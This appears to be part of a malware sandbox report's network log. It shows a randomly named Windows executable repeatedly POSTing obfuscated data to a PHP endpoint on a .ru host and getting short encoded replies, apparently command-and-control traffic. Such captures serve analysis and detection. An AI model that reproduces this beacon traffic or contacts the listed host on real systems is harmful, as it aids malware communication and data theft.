                                                                                                                                Data Ascii: QU[QVBY_]V[WTUQ]XTXY[PWEVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["32#12".($ "*$#P50)=6(&:!^&%X*
                                                                                                                                Jan 1, 2025 21:48:08.667346954 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:08.838882923 CET957INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:08 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OBYQRalaFnPXVcXDp%2F7yz7nepMBdtQnoWC70vg1qP8Y4IJEoUsA46cuBMNFCl7eZKBHglGZKG3SlnR6V%2Bg6KwbBvCGA7hJ4j6uAk4x5V%2F9A5IqG%2FiremGPGdb2hwznP7DEx66%2BeA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e55da27de98-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3488&min_rtt=1643&rtt_var=4308&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=88970&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 22 0b 3c 1f 27 56 20 1c 21 55 3e 06 2c 07 32 57 31 02 26 33 22 18 28 3b 33 5e 3c 3c 3f 09 31 02 2c 16 33 04 32 0b 3f 21 30 58 3d 0c 20 5c 05 1b 3a 02 27 29 33 59 26 05 26 0a 2a 20 2c 58 21 3f 07 03 2a 23 2f 08 37 38 39 5a 32 16 39 10 30 03 2a 55 29 2c 24 07 2a 56 20 08 26 2d 2a 51 0f 16 38 10 28 33 31 01 29 3c 30 12 26 21 34 1c 36 35 0f 54 26 05 37 1e 27 5c 21 05 28 2d 23 1b 36 20 23 53 24 2f 2a 12 24 2e 30 0d 3a 00 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98"<'V !U>,2W1&3"(;3^<<?1,32?!0X= \:')3Y&&* ,X!?*#/789Z290*U),$*V &-*Q8(31)<0&!465T&7'\!(-#6 #S$/*$.0:&^ "S?UV0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                57192.168.2.449885172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:08.315249920 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:08.671021938 CET1072OUTData Raw: 54 54 5b 53 56 43 59 54 5d 56 5b 57 54 5f 51 5d 58 56 58 5a 5b 5f 57 49 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TT[SVCYT]V[WT_Q]XVXZ[_WIVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["0 #1=Z6(0='"4?$4#%$% !=)E<X7&!^&%X*+
                                                                                                                                Jan 1, 2025 21:48:08.758801937 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:09.023783922 CET801INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:08 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cn92t2iHszpLtir0idL8aqoaTnKtEQKsnCUrLwfC5LWVXnlbjeNS68m3SBjR%2Fe5b6NtRz9DbOWBe6NtzSANBdEVRW88jPVRw7MNAoSDJnlsuyk03WMOmSzlM340Dyn9aNcP70iEH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e567cbd0c96-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2134&min_rtt=1647&rtt_var=1593&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=263110&cwnd=152&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                58192.168.2.449894172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:09.162414074 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:09.532507896 CET1072OUTData Raw: 54 5f 5b 53 56 43 5c 55 5d 56 5b 57 54 5f 51 52 58 51 58 58 5b 53 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T_[SVC\U]V[WT_QRXQXX[SWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!X'3Z7. >\'.86;S+7U!S$ *=@<X81!^&%X*+
                                                                                                                                Jan 1, 2025 21:48:09.614173889 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:09.871818066 CET811INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:09 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wcyBWBAp%2BB7bIu9P8Qod3YfVYMHqarAJN5b5MuG1jg%2FH%2BV0hQ7QlAXO5Gndi4BmocjV2qeeY3LLwsVqlcRRPhFp%2BswjAzswUrTk4H2LZfOcc1r6%2BS7QR%2F9aenLZI5MnNrqZeYntt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e5bce60f5fa-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3038&min_rtt=1566&rtt_var=3531&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=109428&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                59192.168.2.449900172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:10.285330057 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:10.639862061 CET1072OUTData Raw: 54 54 5e 53 53 43 5c 55 5d 56 5b 57 54 5a 51 5c 58 55 58 58 5b 54 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TT^SSC\U]V[WTZQ\XUXX[TWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!$3#T=[ -7]'= 6;?T5'$02[*5!C<>'%*!^&%X*?
                                                                                                                                Jan 1, 2025 21:48:10.763979912 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:10.951622009 CET808INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:10 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e3HbJ7KoN7Xwue7c1BbffZl6ZQ6A0CcNJifkMb%2B6Gim4RRoSUuC8Ml8%2FQyHtqXaUojzJMqVG%2BI6driitQIjIkSjLjHj%2FXF1TyHiRE%2BYLfiD0q%2Bn%2FwTOfw7Nor7jyBpwhPA6HsrUR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e62f8998c18-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7471&min_rtt=1804&rtt_var=12012&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=30967&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a
                                                                                                                                Data Ascii: 40VX[
                                                                                                                                Jan 1, 2025 21:48:11.043833971 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                60192.168.2.449906172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:11.186532974 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:11.546365023 CET1072OUTData Raw: 54 53 5b 57 56 40 5c 55 5d 56 5b 57 54 5b 51 5b 58 53 58 5b 5b 5e 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TS[WV@\U]V[WT[Q[XSX[[^WAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["3#Y#-Y68$= 6;<?'#W#5;'0*>(02*!^&%X*
                                                                                                                                Jan 1, 2025 21:48:11.630685091 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:11.854441881 CET811INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:11 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xdYYHrjPlabKF%2BEcPE0V0hWN6Uvj0pY4t7LLtGAlBPCKmalA1VAQoesuYo%2Fh88Eq3u7882y%2FN%2BThRFRT6Az8ujfJfar3G521Ajqtg13P%2FtoLe2FkIR%2BDbecb5KE4d8JH8ifVuAa3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e686bda437e-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2569&min_rtt=1594&rtt_var=2548&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=155401&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                61192.168.2.449912172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:11.986201048 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:12.427242994 CET1072OUTData Raw: 54 5e 5b 52 56 45 5c 55 5d 56 5b 57 54 5e 51 5e 58 54 58 58 5b 50 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T^[RVE\U]V[WT^Q^XTXX[PWBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!0'X#2%\! $";R*4?P5$% ])&(;2!^&%X*/
                                                                                                                                Jan 1, 2025 21:48:12.429788113 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:12.718043089 CET808INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:12 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xtDnKnYYu0810QYeCw%2B%2BNAR7FuCrOgK5GGiaM47u8ROAdB8IH2BZOx%2FLenCcRWaOEcrkppOAaSaQ6jsFVbqRZT8g839MV52x9tY6RETnAzcqmrh9vcAZRaUQ%2F%2Bk5ARDuZkgGlHoT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e6d6e6018c0-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3318&min_rtt=1586&rtt_var=4059&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=94528&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                62192.168.2.449918172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:12.850249052 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:13.202413082 CET1072OUTData Raw: 54 57 5e 53 56 43 59 5f 5d 56 5b 57 54 55 51 5e 58 50 58 5d 5b 52 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TW^SVCY_]V[WTUQ^XPX][RWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!^&"' =[".?Z$[,6'U<64R$5(&(%!^&%X*
                                                                                                                                Jan 1, 2025 21:48:13.294739008 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:13.564369917 CET820INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:13 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lK6arLxC%2FyaF6F%2FF44ruMruqfIp%2B4MKWUQc8E%2FoSXG6JsDD%2F%2Ba1lajj1eoWJ3T%2BU5VY%2FM6%2BMaBlNVR22miICOPhITg%2BCrE%2BCmedinu0Ex11n7y0esxp5L0qZyBpmKEz3sb3sIIOZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e72ccbb421f-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4654&min_rtt=1673&rtt_var=6590&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=57198&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                63192.168.2.449924172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:13.687453032 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                64192.168.2.449925172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:13.849174976 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:14.202760935 CET1788OUTData Raw: 54 52 5e 50 53 47 59 5e 5d 56 5b 57 54 5f 51 59 58 51 58 5d 5b 50 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TR^PSGY^]V[WT_QYXQX][PWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!$1 #![!=#\3['";<*74"(S$ **&:<$_1!^&%X*+
                                                                                                                                Jan 1, 2025 21:48:14.322061062 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:14.583705902 CET953INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:14 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BCq0gFxtjy%2B7cT778rMrYiJbhZz78Sa1GtAd4SAJNrZqoFXAzVqLAqQ5edQKPK3uMwO2wQiM621u9vtPUKgiy6cPagIY%2BpCzbXqJt0SlDHJo6vMbf6ZHORAQFu3givxuBK4gqXei"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e792bea5e65-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4340&min_rtt=2112&rtt_var=5248&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=73227&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 21 52 28 1f 33 55 34 22 3d 54 2a 16 0e 01 32 31 3e 5c 31 1d 03 08 28 16 01 59 2b 2f 2b 0d 26 5a 20 17 27 2a 21 57 2b 22 02 5d 3e 26 20 5c 05 1b 39 14 30 07 23 5e 25 2b 0f 1e 2a 33 20 58 37 3c 21 01 2a 20 38 1d 21 38 3d 10 25 16 26 0b 33 3a 0b 0d 28 02 27 5f 3d 30 3c 0d 26 07 2a 51 0f 16 3b 0a 3d 20 26 10 2a 3c 3b 02 30 32 3b 06 35 43 31 56 25 05 3b 1d 27 04 35 00 3f 00 1e 0e 22 1d 33 11 32 12 04 13 32 10 37 50 39 00 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98!R(3U4"=T*21>\1(Y+/+&Z '*!W+"]>& \90#^%+*3 X7<!* 8!8=%&3:('_=0<&*Q;= &*<;02;5C1V%;'5?"3227P9&^ "S?UV0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                65192.168.2.449929172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:13.971604109 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:14.327630997 CET1072OUTData Raw: 54 5e 5b 5f 56 42 59 53 5d 56 5b 57 54 5f 51 5d 58 5c 58 5c 5b 52 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T^[_VBYS]V[WT_Q]X\X\[RWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!0 #2Z .7]$=0[6(??+W#&7$V:>%)D+.32:!^&%X*+
                                                                                                                                Jan 1, 2025 21:48:14.434164047 CET25INHTTP/1.1 100 Continue
